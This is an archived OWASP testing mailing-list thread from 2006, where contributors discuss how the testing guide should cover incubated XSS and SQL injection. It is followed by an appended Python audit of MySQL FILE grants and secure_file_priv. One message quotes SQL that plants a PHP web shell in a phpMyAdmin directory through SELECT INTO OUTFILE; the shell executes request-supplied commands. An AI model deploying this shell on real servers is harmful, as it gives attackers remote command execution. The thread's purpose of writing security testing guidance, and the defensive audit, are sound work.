[Owasp-testing] Brainstorming about the new Index

Eoin eoinkeary at gmail.com
Thu Oct 12 17:55:20 EDT 2006


sure,
but we cannot take into account every variant of attack for each
vulnerability discovered.
If one discovers SQL injection it is up to them to use a little skill in
order to exploit this vulnerability.
Also all systems are different so the list of variants would be endless.
I believe we need to take a "middle" approach here and show how to do stuff
or discover vulnerabilities but exploitation is the area that takes some
skill and also a lot of trial and error.
Documenting all the "vectors" of attack would increase the workload of the
project and we only have until December.
but it is a good idea nevertheless.

-ek


On 12/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
>
>
> You are right. It is a simple XSS incubated attack.
>
> But on the other hand, now that I continue to think about it... What
> about using a SQL-injection vulnerability to upload code to the Db, next
> if the server has shell enabled this can be used to execute this code?
> (I Googled an example of something like this for attacking PHP's PMA that I
> copy below.)
>
> The point is that if the pentester discovers a SQL-injection, he might
> be able to do a lot of things. It appears that the SQL-injection gives
> the pentester a new /asset/ (the ability to make certain queries to
> certain tables in the Db). After it, with all the information he has
> gathered so far, the pen tester will decide what to do. Probably, he
> will want to research the implications of the SQL-injection
> vulnerability. Colleague Gerardo Richarte has proposed this methodology
> (see, e.g., slides from his PacSec Japan 2003 talk) over the traditional
> (IG, Attack, Penetrate and report) approach.
>
> Moreover, sometimes during a pen test it isn't just enough to discover a
> SQL-injection. You need to prove the impact of this vulnerability to
> developers that think it is inoffensive and shouldn't be fixed.
>
> Then my question is: should we include a prelude on pen testing
> methodology before 4.1? Then, in accordance with Matt's suggestion,
> should each section (e.g., XSS incubated attacks) include a subsection
> where all the attacks assume that condition X holds (where X is some
> sort of SQL-injection vulnerability was found, or such permissions are
> badly set, et cetera)? I think this might be beneficial to the readers.
>
> Ariel
>
> --
>
> use mysql;
> CREATE TABLE temptab (codetab text);
> INSERT INTO temptab (codetab) values
> ('<? $cmd = $_REQUEST["-cmd"]; ?>
> <html>
> <head><title>help.php</title></head>
> <onLoad="document.forms[0].elements[-cmd].focus()">
> <form method=POST>
> <br>
> <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
> <hr>
> <pre>
>         <? if($cmd != "") print Shell_Exec($cmd); ?>
> </pre>
> </form>
> </body>
> </html>');
> SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
> DROP TABLE temptab;
> FLUSH LOGS;
>
> Matteo Meucci wrote:
> > Yes,
> > I think you are right: this paragraph already exists.
> > look at:
> > (http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents)
> > 4.6 Data Validation Testing 0% TD
> > 4.6.1 Cross site scripting 0% TD
> > 4.6.1.1 Incubated attacks 0% TD
> >
> > Ariel maybe says that Incubated attacks are a combination of SQL Inj
> > and XSS, but we can reasonably affirm that it is a particular XSS attack.
> > In the same paragraph we can show an example of how an XSS Inc Attack
> > works exploiting an SQL Inj vulnerability.
> > Right?
> >
> > Mat
> >
> >
> >
> > On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
> >> Hi,
> >> incubated attacks are important enough to warrant a section under XSS.
> >> It is another variant of XSS.
> >> Matteo what do you think?
> >>
> >>
> >>
> >> On 11/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
> >> > Hi all,
> >> >
> >> > my first post and 2 cents here:
> >> >
> >> > I guess we should make a difference between the techniques of unit
> >> > testing and the results of UT. Even if UT can be used to... e.g.,
> >> > discover BO or SQL-injection vulns.
> >> >
> >> > Although, I noticed that there is an Appendix for fuzzing which is
> >> > another technique for discovering (some) vulnerabilities.
> >> >
> >> >
> >> > A new question: imagine the following situation: The pen tester
> >> > discovers a SQL-injection vulnerability in a webapp he is auditing.
> >> > This vuln. allows him to store some javascript in the Db and therefore
> >> > perpetrate an XSS attack (incubated) on the users of this webapp.  My
> >> > question is where do we describe these attacks? (I think they are
> >> > important enough to be included somewhere.)
> >> >
> >> > Cheers,
> >> > Ariel
> >> >
> >> > Eoin Keary wrote:
> >> > > Hi,
> >> > >
> >> > > Question:
> >> > > Do we want to get into Unit Testing and SDLC methodology in this
> >> > > guide?
> >> > > I thought they would be more suited to Andrew's dev guide or the code
> >> > > review project.
> >> > > unit testing is related to testing small blocks of a system
> >> > > individually and hence a development phase done prior to system and
> >> > > integration testing.
> >> > > The Guide currently focuses on penetration testing which is "After
> >> > > the Fact" testing and not really done until the system is developed.
> >> > >
> >> > > What y'all think?
> >> > >
> >> > > Eoin
> >> > >
> >> > _______________________________________________
> >> > Owasp-testing mailing list
> >> > Owasp-testing at lists.owasp.org
> >> > http://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >
> >>
> >>
> >>
> >> --
> >> Eoin Keary OWASP - Ireland
> >> http://www.owasp.org/local/ireland.html
> >>  http://www.owasp.org/index.php/OWASP_Testing_Project
> >> http://www.owasp.org/index.php/OWASP_Code_Review_Project
> >>
> >>
> >>
> >
> >
>



-- 
Eoin Keary OWASP - Ireland
http://www.owasp.org/local/ireland.html
http://www.owasp.org/index.php/OWASP_Testing_Project
http://www.owasp.org/index.php/OWASP_Code_Review_Project
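As an added defender-side example (not code from this thread), here is a small audit of the two MySQL conditions the quoted INTO OUTFILE trick depends on: an account holding the global FILE privilege, and a secure_file_priv setting that does not confine file writes. The SHOW GRANTS lines and the secure_file_priv value are constructed samples, so it runs without a live database.

```python
"""Audit MySQL grant strings and secure_file_priv for the conditions that
let an injected SELECT ... INTO OUTFILE drop a file into a web root.
All inputs below are constructed samples; nothing connects to a server."""
import re

# Constructed sample output of SHOW GRANTS for a web application account.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'webapp'@'localhost'",
]
# Constructed sample value of @@secure_file_priv:
#   ''   -> unrestricted, NULL/None -> file ops disabled, path -> confined.
SAMPLE_SECURE_FILE_PRIV = ""

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+", re.I)


def grants_file_privilege(grant_line):
    """True if this GRANT line confers FILE, directly or via ALL on *.*.
    FILE is a global privilege, so only a *.* grant can carry it."""
    m = GRANT_RE.match(grant_line.strip())
    if not m or m.group("scope") != "*.*":
        return False
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return bool(privs & {"FILE", "ALL", "ALL PRIVILEGES"})


def outfile_risk(grant_lines, secure_file_priv):
    """Classify whether INTO OUTFILE could write outside the data dir.
    Returns 'disabled', 'no_file_priv', 'restricted' or 'unrestricted'."""
    if secure_file_priv is None:
        return "disabled"          # file import/export disabled server-wide
    if not any(grants_file_privilege(g) for g in grant_lines):
        return "no_file_priv"      # account cannot use INTO OUTFILE at all
    if secure_file_priv == "":
        return "unrestricted"      # any path writable by the mysqld OS user
    return "restricted"            # writes confined to the secure_file_priv dir


if __name__ == "__main__":
    print(outfile_risk(SAMPLE_GRANTS, SAMPLE_SECURE_FILE_PRIV))
```

The remediation the classifier points at is the usual one: drop FILE (and ALL on *.*) from application accounts and set secure_file_priv to a directory outside the web root or to NULL.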